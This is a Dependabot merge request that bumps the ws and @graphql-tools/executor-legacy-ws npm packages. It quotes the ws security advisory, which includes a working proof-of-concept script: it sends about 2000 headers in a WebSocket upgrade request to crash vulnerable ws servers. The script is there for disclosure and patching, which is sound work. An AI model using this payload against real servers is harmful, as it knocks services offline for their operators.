Skip to content

[Security] Bump ws and @graphql-tools/executor-legacy-ws

DependabotCatalogueIndicateurs requested to merge dependabot-npm_and_yarn-ws-and-graphql-tools-executor-legacy-ws-8.18.0 into develop

Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together. Updates ws from 8.13.0 to 8.18.0 This update includes a security fix.

Vulnerabilities fixed

ws affected by a DoS when handling a request with many HTTP headers

Impact

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];

</tr></table>

... (truncated)

Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1

Release notes

Sourced from ws's releases.

8.18.0

Features

  • Added support for Blob (#2229).

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits
  • 976c53c [dist] 8.18.0
  • 59b9629 [feature] Add support for Blob (#2229)
  • 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
  • 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • Additional commits viewable in compare view

Updates @graphql-tools/executor-legacy-ws from 1.0.1 to 1.0.6

Changelog

Sourced from @​graphql-tools/executor-legacy-ws's changelog.

1.0.6

Patch Changes

1.0.5

Patch Changes

1.0.4

Patch Changes

1.0.3

Patch Changes

1.0.2

Patch Changes

Commits
  • f59d7d7 chore(release): update monorepo packages versions (#5929)
  • 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
  • a3259da chore(release): update monorepo packages versions (#5763)
  • 38a92ab Use ranged dependencies
  • 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
  • 1bd71cd chore(release): update monorepo packages versions (#5631)
  • 6c26c4f chore(deps): update all non-major dependencies (#5603)
  • 291b37b chore(release): update monorepo packages versions (#5577)
  • b153191 fix(deps): update all non-major dependencies (#5575)
  • b8b8164 chore(release): update monorepo packages versions (#5571)
  • Additional commits viewable in compare view

Merge request reports